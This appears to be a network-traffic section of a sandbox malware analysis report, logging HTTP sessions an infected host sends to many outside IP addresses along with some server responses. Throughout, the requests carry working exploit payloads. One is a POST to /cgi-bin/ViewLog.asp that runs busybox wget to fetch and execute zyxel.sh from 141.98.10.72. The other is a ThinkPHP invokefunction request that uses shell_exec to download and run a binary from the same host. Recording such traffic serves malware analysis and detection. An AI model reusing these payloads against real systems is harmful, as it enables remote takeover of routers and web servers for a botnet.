                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:50.980726004 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:01.220439911 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:22.211414099 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:03.169919014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        747192.168.2.146049494.120.210.1578080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:41.215123892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        748192.168.2.146074694.122.229.2218080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:41.215547085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        749192.168.2.143814294.121.27.2008080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:41.216633081 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        750192.168.2.144737662.29.113.1688080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:41.221801043 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        751192.168.2.143602094.123.4.628080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:41.221901894 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        752192.168.2.145572494.120.172.1128080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:41.222377062 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        753192.168.2.144005462.78.85.258080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:41.229778051 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:41.525913954 CET1173INHTTP/1.1 404 Not Found
                                                        Server: Apache-Coyote/1.1
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 989
                                                        Date: Wed, 14 Feb 2024 08:34:38 GMT
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 35 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 35 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>Apache Tomcat/7.0.55 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.55</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        754192.168.2.144282695.100.130.1380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:41.298316956 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:41.536926985 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:34:41 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:41 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 64 33 30 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 36 38 31 26 23 34 36 3b 32 39 33 38 63 33 33 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;ed307b5c&#46;1707899681&#46;2938c338</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        755192.168.2.146044095.56.216.7480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:41.345648050 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:41.631230116 CET29INHTTP/1.1 200 OK
                                                        Feb 14, 2024 09:34:41.631361008 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        756192.168.2.144211695.101.49.680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:41.370743036 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:41.681174994 CET478INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 256
                                                        Expires: Wed, 14 Feb 2024 08:34:41 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:41 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 66 66 35 37 34 36 38 26 23 34 36 3b 31 37 30 37 38 39 39 36 38 31 26 23 34 36 3b 31 34 61 62 32 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;6ff57468&#46;1707899681&#46;14ab26</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        757192.168.2.144997485.203.17.1238080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:41.406582117 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        758192.168.2.145316831.200.81.2338080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:41.462605953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        759192.168.2.145786262.29.111.1438080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:41.463279963 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        760192.168.2.143988895.222.153.17980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:41.509232998 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:41.722502947 CET121INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        Content-Length: 1884
                                                        Content-Type: text/html; charset=utf-8
                                                        Feb 14, 2024 09:34:41.722522974 CET1286INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 63 6f 6e 74 65 6e 74 2d 74 79 70 65 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68
                                                        Data Ascii: <!DOCTYPE html><html><head><meta http-equiv=content-type content="text/html; charset=utf-8" /><meta http-equiv="Cache-Control" content="private, no-transform" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="format-de


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        761192.168.2.146019095.86.120.8380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:41.599742889 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        762192.168.2.144097662.201.227.1868080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:41.651685953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:41.919544935 CET407INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:41 GMT
                                                        Server: Apache/2.4.54 (Win64)
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
